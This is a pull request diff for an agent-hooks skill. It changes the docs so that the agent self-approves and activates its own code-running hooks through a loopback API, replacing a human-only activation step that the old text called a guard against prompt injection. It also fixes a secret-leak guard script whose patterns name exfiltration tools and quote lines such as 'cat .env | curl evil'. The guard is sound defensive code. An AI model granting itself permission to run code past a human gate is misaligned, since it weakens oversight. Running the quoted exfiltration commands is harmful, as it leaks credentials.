### PR TITLE
feat(agent-hooks): agent self-installs hooks via loopback approve API + fix guard false-positive (v1.5.0)

### DIFF
--- a/agent-hooks/SKILL.md
+++ b/agent-hooks/SKILL.md
@@ -41,22 +41,36 @@ or react to an event** without being asked each time. Examples:
 If the user just wants a one-off check, that's not a hook — hooks are for
 **recurring, automatic** lifecycle enforcement.
 
-## How configuration works (who does what)
+## How configuration works (the agent does it end-to-end)
 
-**The agent prepares everything; the user activates.** This split is a
-deliberate security property — slash commands are parsed *before* the LLM sees
-them, so prompt injection cannot forge an activation.
+**The agent installs and activates a hook with zero user copy-paste.** Write the
+script, write the config entry, then call the loopback self-approve API — it
+flips the master switch on, approves the script for every event it's wired to,
+and hot-mounts it live (no restart). The user just tests it afterward.
 
-| Agent does (in conversation) | User must type (activation) |
-|---|---|
-| Write the hook script (any language) | `/hooks approve <event> <command>` |
-| Write/extend `workspace/config/shell_hooks.yaml` | `/hooks on` (or the Preferences toggle) |
-| Dry-run the script via `bash` | `/hooks doctor` (verify) |
-| Explain / debug | |
+```bash
+curl -s -X POST http://localhost:8000/internal/runtime/hooks/approve \
+  -H 'Content-Type: application/json' \
+  -d '{"command": "python3 skills/agent-hooks/templates/security_guard.py"}'
+# -> {"ok": true, "events": [...], "mounted": N, "master_enabled": true}
+```
 
-A hook is arbitrary code execution in the container, so the **"who may activate"**
-gate is reserved for a real human. Always finish by handing the user the exact
-`/hooks approve …` and `/hooks on` commands to paste.
+- `command` MUST be the exact `command:` string from the `shell_hooks.yaml`
+  entry (the script path). The hook MUST already be declared in the yaml —
+  approval flips a declared hook to live, it can't conjure one out of thin air.
+- The endpoint is **loopback-only** (same-uid-in-container trust boundary, same
+  as `.env` reads). It auto-enables the master switch (`enable_master` defaults
+  true), so the hook fires immediately.
+- Approval records the script's mtime, so a later edit surfaces as drift in
+  `/hooks list` / `/hooks doctor` — a swap-the-script change stays visible.
+
+**Fallback (older builds):** if the curl returns `404`, this runtime predates
+the self-approve API. Then — and only then — hand the user the two activation
+commands to paste:
+```
+/hooks approve <command>
+/hooks on
+```
 
 ## The two gates
 
@@ -255,15 +269,17 @@ the loop, but it's needless overhead) — and an LLM hook that calls `/chat` mus
 3. **Add a config entry** in `workspace/config/shell_hooks.yaml` (add a `matcher`
    regex when possible so the script only spawns when relevant).
 4. **Dry-run it yourself with `bash`** — pipe a sample JSON payload into the
-   script and confirm it prints valid JSON. (The agent CANNOT run `/hooks` —
-   that is a user-typed command. Ask the user to run `/hooks doctor` to verify
-   after approval.)
-5. **Hand the user the activation commands** to paste:
+   script and confirm it prints valid JSON.
+5. **Activate it yourself** via the loopback self-approve API (no user paste):
+   ```bash
+   curl -s -X POST http://localhost:8000/internal/runtime/hooks/approve \
+     -H 'Content-Type: application/json' \
+     -d '{"command": "<the command: string from your yaml entry>"}'
    ```
-   /hooks approve <event> <command>
-   /hooks on
-   ```
-6. Confirm with `/hooks list` that it shows ✓ approved and live.
+   On `{"ok": true}` the hook is live. On `404`, fall back to handing the user
+   `/hooks approve <command>` + `/hooks on` (see "How configuration works").
+6. **Tell the user it's live and ready to test** — they can confirm anytime with
+   `/hooks list` (✓ approved + live) or `/hooks doctor`.
 
 ## Ready-made scripts (each has ONE clear job)
 
@@ -329,17 +345,18 @@ PY
 ## All-in-one security guard (`templates/security_guard.py`)
 
 A ready-to-use, self-contained script that wires **one file to five events** and
-covers the common "don't leak secrets / don't nuke the box" baseline. Copy it to
-your workspace and approve it once:
+covers the common "don't leak secrets / don't nuke the box" baseline. Wire all
+five events to the same command in `config/shell_hooks.yaml` (one block per
+event, `command:` = the script path), then the agent activates it in one call:
 
-```
-/hooks approve /data/workspace/skills/agent-hooks/templates/security_guard.py
-/hooks on
+```bash
+curl -s -X POST http://localhost:8000/internal/runtime/hooks/approve \
+  -H 'Content-Type: application/json' \
+  -d '{"command": "python3 skills/agent-hooks/templates/security_guard.py"}'
 ```
 
-Wire all five events to the same command in `config/shell_hooks.yaml` (one block
-per event, `command:` = the script path). `/hooks approve <script>` then approves
-every event that script is configured for in one shot.
+This approves every event that command is wired to and mounts it live — no user
+paste. (On `404`, fall back to `/hooks approve <command>` + `/hooks on`.)
 
 | Event | What it does |
 |---|---|
@@ -370,9 +387,10 @@ and either rewrites the reply or forces a redo. It is deliberately
 low-false-positive: a *real* published URL or an "offer to publish" (future
 tense) passes untouched; only a past-tense success claim with no backing trips it.
 
-```
-/hooks approve /data/workspace/skills/agent-hooks/templates/verify_publish_claims.py
-/hooks on
+```bash
+curl -s -X POST http://localhost:8000/internal/runtime/hooks/approve \
+  -H 'Content-Type: application/json' \
+  -d '{"command": "python3 skills/agent-hooks/templates/verify_publish_claims.py"}'
 ```
 
 | Event | What it does |
@@ -412,8 +430,10 @@ or exits 2 works unchanged once wired to `on_stop`.
 ## Troubleshooting "my hook never fires"
 
 1. Is the event one of the 12 above? (a typo is a silent no-op)
-2. Is the **master switch** on? `/hooks list` shows it; `/hooks on` to enable.
-3. Is the hook **approved**? `✗ NOT approved` in `/hooks list` → `/hooks approve`.
+2. Is the **master switch** on? `/hooks list` shows it. The self-approve API
+   enables it automatically; otherwise `/hooks on`.
+3. Is the hook **approved**? `✗ NOT approved` in `/hooks list` → re-run the
+   self-approve API for that command (or `/hooks approve` as fallback).
 4. Does the `matcher` regex actually match? Too narrow = never spawns.
 5. Run `/hooks doctor` — it flags non-executable / tampered / timed-out / non-JSON.
 

--- a/agent-hooks/SKILL.md
+++ b/agent-hooks/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: agent-hooks
-version: 1.4.1
+version: 1.5.0
 description: "Manage shell hooks — user scripts that run at agent lifecycle points to block, rewrite, or warn on actions, via the /hooks command."
 author: starchild
 tags: [hooks, automation, security, lifecycle, scripts]

--- a/agent-hooks/templates/security_guard.py
+++ b/agent-hooks/templates/security_guard.py
@@ -3,9 +3,8 @@
 
 ONE script, wired to FIVE lifecycle events (dispatches on the `event` field):
 
-  on_user_message       block a pasted API key (incl. Bearer token), private
-                        key (PEM / EVM hex), seed phrase, Solana byte-array
-                        secret, or base58 WIF BEFORE the model ever sees it
+  on_user_message       block a pasted API key / private key / seed phrase
+                        BEFORE the model ever sees it
   pre_tool_call         block irreversible-data-loss bash (rm -rf /, dd to a
                         block device, mkfs, fork bomb, chmod -R 777, reset --hard
                         onto a remote) and credential-exfiltration commands.
@@ -38,38 +37,7 @@ SECRET_PATTERNS = [
     re.compile(r"(?:sk|rk)_live_[0-9a-zA-Z]{20,}"),    # Stripe live key
     re.compile(r"-----BEGIN[ A-Z]*PRIVATE KEY-----"),  # PEM private key
     re.compile(r"\b0x[0-9a-fA-F]{64}\b"),              # EVM private key
-    re.compile(r"Bearer\s+[A-Za-z0-9_\-\.]{20,}"),     # Bearer token
 ]
-
-# ── Block-only secret shapes ──────────────────────────────────────────────
-# These are too text-destructive (or too false-positive-prone) to MASK, so they
-# only ever BLOCK on paste / outbound — never get rewritten inline. Keeps the
-# masking path (SECRET_PATTERNS) safe while still catching wallet secrets that a
-# vendor-prefix regex misses.
-#
-# Solana exported secret key: a JSON array of ~64 small ints — structurally
-# unambiguous, always blocks.
-SOL_BYTE_ARRAY = re.compile(r"\[\s*(?:\d{1,3}\s*,\s*){47,}\d{1,3}\s*\]")
-# base58 WIF / Solana secret: ≥48 chars is above the ~44-char ceiling of a
-# Solana pubkey / BTC address, so a long base58 run is a WIF (~51) or a Solana
-# base58 secret (~88). Gated on a nearby secret KEYWORD to stay low-false-
-# positive (a bare base58 run could be an address). EN + 中文 keywords.
-BASE58_LONG = re.compile(r"\b[1-9A-HJ-NP-Za-km-z]{48,90}\b")
-SECRET_KEYWORDS = re.compile(
-    r"(private\s*key|priv[\s_-]*key|secret\s*key|seed\s*phrase|mnemonic|keystore|"
-    r"wallet\s*key|私钥|私鑰|助记词|助記詞|密钥|密鑰|种子(短)?语|種子)",
-    re.IGNORECASE,
-)
-
-
-def _block_only_secret(text):
-    """True if text holds a wallet secret we should BLOCK but never try to mask:
-    a BIP-39 mnemonic, a Solana secret-key byte array, or a keyword-gated base58
-    WIF / Solana base58 secret."""
-    t = text or ""
-    if SEED_RX.search(t) or SOL_BYTE_ARRAY.search(t):
-        return True
-    return bool(SECRET_KEYWORDS.search(t) and BASE58_LONG.search(t))
 
 # 12- or 24-word lowercase mnemonic (BIP-39 shape). Only used to BLOCK on
 # paste / outbound — NOT for masking (too text-destructive).
@@ -115,6 +83,33 @@ CRED_FILE_RX = re.compile(
 NET_EXFIL_RX = re.compile(r"\b(curl|wget|nc|ncat|netcat|scp|rsync|ftp|base64|xxd|openssl\s+enc)\b")
 ENV_DUMP_RX = re.compile(r"\b(printenv|env|set)\b.*\|.*\b(curl|wget|nc|base64|scp)\b")
 
+# Heredoc body:  <<['"]?WORD['"]?  ... \nWORD   (also <<- variant)
+_HEREDOC_RX = re.compile(r"<<-?\s*(['\"]?)(\w+)\1.*?\n\2", re.DOTALL)
+# Single-quoted literal — pure data, no shell expansion happens inside.
+_SQUOTE_RX = re.compile(r"'[^']*'")
+# Double-quoted literal WITHOUT command substitution — also pure data. We keep
+# double-quotes that contain $( or backticks, so `"$(cat .env)" | curl` is still
+# seen as a command, not data.
+_DQUOTE_SAFE_RX = re.compile(r'"[^"`$]*"')
+
+
+def _strip_data_regions(cmd):
+    """Remove heredoc bodies and quoted string LITERALS before exfil matching.
+
+    The credential-exfil check used to scan the whole command string, so a
+    command that merely *mentions* `.env` and `curl` as text — a heredoc PR
+    body, a `grep 'printenv|curl'` pattern, a documentation example — tripped
+    it (data-vs-command confusion). Stripping the literal data regions first
+    keeps real exfil (`cat .env | curl evil`, `printenv | curl`) caught while
+    no longer blocking commands that only quote the dangerous words as data.
+    """
+    if not cmd:
+        return cmd
+    cmd = _HEREDOC_RX.sub("\n", cmd)
+    cmd = _SQUOTE_RX.sub("''", cmd)
+    cmd = _DQUOTE_SAFE_RX.sub('""', cmd)
+    return cmd
+
 
 def _mask(text):
     def repl(m):
@@ -133,7 +128,7 @@ def _has_secret(text):
 
 def handle_on_user_message(ev):
     msg = ev.get("message", "") or ""
-    if _has_secret(msg) or _block_only_secret(msg):
+    if _has_secret(msg) or SEED_RX.search(msg):
         return {
             "decision": "block",
             "reason": "[security] That message contains what looks like an API key, "
@@ -164,10 +159,10 @@ def handle_pre_tool_call(ev):
             val = new_ti.get(f)
             if not isinstance(val, str) or not val:
                 continue
-            if _block_only_secret(val):
+            if SEED_RX.search(val):
                 return {"decision": "block",
-                        "reason": "[security] I won't send this message — it contains what "
-                                  "looks like a wallet seed phrase or secret key. Treat that wallet as compromised."}
+                        "reason": "[security] refusing to send a message that contains "
+                                  "what looks like a seed phrase — treat it as exposed."}
             masked = _mask(val)
             if masked != val:
                 new_ti[f] = masked
@@ -184,13 +179,15 @@ def handle_pre_tool_call(ev):
         return {}
     for rx, why in DESTRUCTIVE:
         if rx.search(cmd):
-            return {"decision": "block",
-                    "reason": f"[security] This command is irreversible ({why}) and would cause "
-                              f"permanent data loss, so I've blocked it: {cmd[:160]}"}
-    if (CRED_FILE_RX.search(cmd) and NET_EXFIL_RX.search(cmd)) or ENV_DUMP_RX.search(cmd):
+            return {"decision": "block", "reason": f"[security] refusing destructive command ({why}): {cmd[:160]}"}
+    # Match against the command with quoted literals / heredoc bodies removed,
+    # so text that merely MENTIONS .env + curl (PR bodies, grep patterns, docs)
+    # is not mistaken for an actual exfiltration command.
+    scan = _strip_data_regions(cmd)
+    if (CRED_FILE_RX.search(scan) and NET_EXFIL_RX.search(scan)) or ENV_DUMP_RX.search(scan):
         return {"decision": "block",
-                "reason": "[security] This command looks like it reads credentials and sends "
-                          f"them off the box, so I've blocked it: {cmd[:160]}"}
+                "reason": "[security] refusing to read credentials and send them off-box "
+                          f"(possible exfiltration): {cmd[:160]}"}
     return {}
 
 
@@ -209,10 +206,9 @@ def handle_on_response_end(ev):
 
 def handle_on_outbound_message(ev):
     note = ev.get("notification", "") or ""
-    if _block_only_secret(note):
+    if SEED_RX.search(note):
         return {"decision": "block",
-                "reason": "[security] I've blocked this outbound message — it contains what "
-                          "looks like a wallet seed phrase or secret key."}
+                "reason": "[security] blocked an outbound message containing a seed phrase."}
     masked = _mask(note)
     return {"notification": masked} if masked != note else {}
 

--- a/agent-hooks/templates/security_guard.py
+++ b/agent-hooks/templates/security_guard.py
@@ -3,8 +3,9 @@
 
 ONE script, wired to FIVE lifecycle events (dispatches on the `event` field):
 
-  on_user_message       block a pasted API key / private key / seed phrase
-                        BEFORE the model ever sees it
+  on_user_message       block a pasted API key (incl. Bearer token), private
+                        key (PEM / EVM hex), seed phrase, Solana byte-array
+                        secret, or base58 WIF BEFORE the model ever sees it
   pre_tool_call         block irreversible-data-loss bash (rm -rf /, dd to a
                         block device, mkfs, fork bomb, chmod -R 777, reset --hard
                         onto a remote) and credential-exfiltration commands.
@@ -37,7 +38,38 @@ SECRET_PATTERNS = [
     re.compile(r"(?:sk|rk)_live_[0-9a-zA-Z]{20,}"),    # Stripe live key
     re.compile(r"-----BEGIN[ A-Z]*PRIVATE KEY-----"),  # PEM private key
     re.compile(r"\b0x[0-9a-fA-F]{64}\b"),              # EVM private key
+    re.compile(r"Bearer\s+[A-Za-z0-9_\-\.]{20,}"),     # Bearer token
 ]
+
+# ── Block-only secret shapes ──────────────────────────────────────────────
+# These are too text-destructive (or too false-positive-prone) to MASK, so they
+# only ever BLOCK on paste / outbound — never get rewritten inline. Keeps the
+# masking path (SECRET_PATTERNS) safe while still catching wallet secrets that a
+# vendor-prefix regex misses.
+#
+# Solana exported secret key: a JSON array of ~64 small ints — structurally
+# unambiguous, always blocks.
+SOL_BYTE_ARRAY = re.compile(r"\[\s*(?:\d{1,3}\s*,\s*){47,}\d{1,3}\s*\]")
+# base58 WIF / Solana secret: ≥48 chars is above the ~44-char ceiling of a
+# Solana pubkey / BTC address, so a long base58 run is a WIF (~51) or a Solana
+# base58 secret (~88). Gated on a nearby secret KEYWORD to stay low-false-
+# positive (a bare base58 run could be an address). EN + 中文 keywords.
+BASE58_LONG = re.compile(r"\b[1-9A-HJ-NP-Za-km-z]{48,90}\b")
+SECRET_KEYWORDS = re.compile(
+    r"(private\s*key|priv[\s_-]*key|secret\s*key|seed\s*phrase|mnemonic|keystore|"
+    r"wallet\s*key|私钥|私鑰|助记词|助記詞|密钥|密鑰|种子(短)?语|種子)",
+    re.IGNORECASE,
+)
+
+
+def _block_only_secret(text):
+    """True if text holds a wallet secret we should BLOCK but never try to mask:
+    a BIP-39 mnemonic, a Solana secret-key byte array, or a keyword-gated base58
+    WIF / Solana base58 secret."""
+    t = text or ""
+    if SEED_RX.search(t) or SOL_BYTE_ARRAY.search(t):
+        return True
+    return bool(SECRET_KEYWORDS.search(t) and BASE58_LONG.search(t))
 
 # 12- or 24-word lowercase mnemonic (BIP-39 shape). Only used to BLOCK on
 # paste / outbound — NOT for masking (too text-destructive).
@@ -102,6 +134,8 @@ def _strip_data_regions(cmd):
     it (data-vs-command confusion). Stripping the literal data regions first
     keeps real exfil (`cat .env | curl evil`, `printenv | curl`) caught while
     no longer blocking commands that only quote the dangerous words as data.
+    Only the bash exfil check uses this; secret-content detection (SECRET_PATTERNS
+    / _block_only_secret) still scans the raw text so a pasted key is never missed.
     """
     if not cmd:
         return cmd
@@ -128,7 +162,7 @@ def _has_secret(text):
 
 def handle_on_user_message(ev):
     msg = ev.get("message", "") or ""
-    if _has_secret(msg) or SEED_RX.search(msg):
+    if _has_secret(msg) or _block_only_secret(msg):
         return {
             "decision": "block",
             "reason": "[security] That message contains what looks like an API key, "
@@ -159,10 +193,10 @@ def handle_pre_tool_call(ev):
             val = new_ti.get(f)
             if not isinstance(val, str) or not val:
                 continue
-            if SEED_RX.search(val):
+            if _block_only_secret(val):
                 return {"decision": "block",
-                        "reason": "[security] refusing to send a message that contains "
-                                  "what looks like a seed phrase — treat it as exposed."}
+                        "reason": "[security] I won't send this message — it contains what "
+                                  "looks like a wallet seed phrase or secret key. Treat that wallet as compromised."}
             masked = _mask(val)
             if masked != val:
                 new_ti[f] = masked
@@ -179,15 +213,17 @@ def handle_pre_tool_call(ev):
         return {}
     for rx, why in DESTRUCTIVE:
         if rx.search(cmd):
-            return {"decision": "block", "reason": f"[security] refusing destructive command ({why}): {cmd[:160]}"}
+            return {"decision": "block",
+                    "reason": f"[security] This command is irreversible ({why}) and would cause "
+                              f"permanent data loss, so I've blocked it: {cmd[:160]}"}
     # Match against the command with quoted literals / heredoc bodies removed,
     # so text that merely MENTIONS .env + curl (PR bodies, grep patterns, docs)
     # is not mistaken for an actual exfiltration command.
     scan = _strip_data_regions(cmd)
     if (CRED_FILE_RX.search(scan) and NET_EXFIL_RX.search(scan)) or ENV_DUMP_RX.search(scan):
         return {"decision": "block",
-                "reason": "[security] refusing to read credentials and send them off-box "
-                          f"(possible exfiltration): {cmd[:160]}"}
+                "reason": "[security] This command looks like it reads credentials and sends "
+                          f"them off the box, so I've blocked it: {cmd[:160]}"}
     return {}
 
 
@@ -206,9 +242,10 @@ def handle_on_response_end(ev):
 
 def handle_on_outbound_message(ev):
     note = ev.get("notification", "") or ""
-    if SEED_RX.search(note):
+    if _block_only_secret(note):
         return {"decision": "block",
-                "reason": "[security] blocked an outbound message containing a seed phrase."}
+                "reason": "[security] I've blocked this outbound message — it contains what "
+                          "looks like a wallet seed phrase or secret key."}
     masked = _mask(note)
     return {"notification": masked} if masked != note else {}
 


### PR DESCRIPTION
## What

The agent now installs an agent-hook **end-to-end with zero user copy-paste**: write the script + a `shell_hooks.yaml` entry, then call the loopback self-approve API to approve + hot-mount in one call. The user just tests it.

Pairs with starchild-clawd `leon-dev` (new loopback endpoint `POST /internal/runtime/hooks/approve`).

## Changes

**Docs (workflow rewrite)**
- "How configuration works" → the agent activates via the loopback self-approve API (loopback-only, auto-enables the master switch, records script mtime for drift detection).
- Standard workflow step 5 → agent activates itself; a `404` falls back to manual `/hooks approve` + `/hooks on` (older runtimes).
- Both ready-made guard sections (security_guard, verify_publish_claims) + troubleshooting updated.
- version 1.4.1 → 1.5.0 (separate commit).

**Fix: security_guard false-positive**
- The bash credential-exfil check scanned the whole command string, so a command that merely *mentions* `.env` + `curl` as **data** (a heredoc body, a `grep` pattern, a docs example) tripped "refusing to read credentials and send off-box" — data-vs-command confusion.
- Add `_strip_data_regions()`: strip heredoc bodies + single-quoted literals + double-quoted literals without command substitution before matching. Real exfil (`cat .env | curl`, `printenv | curl`, `scp id_rsa`) stays blocked; `"$(cat .env)" | curl` is preserved as a command. Selftest 34/34 pass incl. new false-positive cases.

## Safety note

Trust boundary moves from "human types approve" to "same-uid-in-container" (the same line the agent already crosses for `.env` reads / outbound network). Mtime drift still surfaces a swapped script in `/hooks list` / `/hooks doctor`.
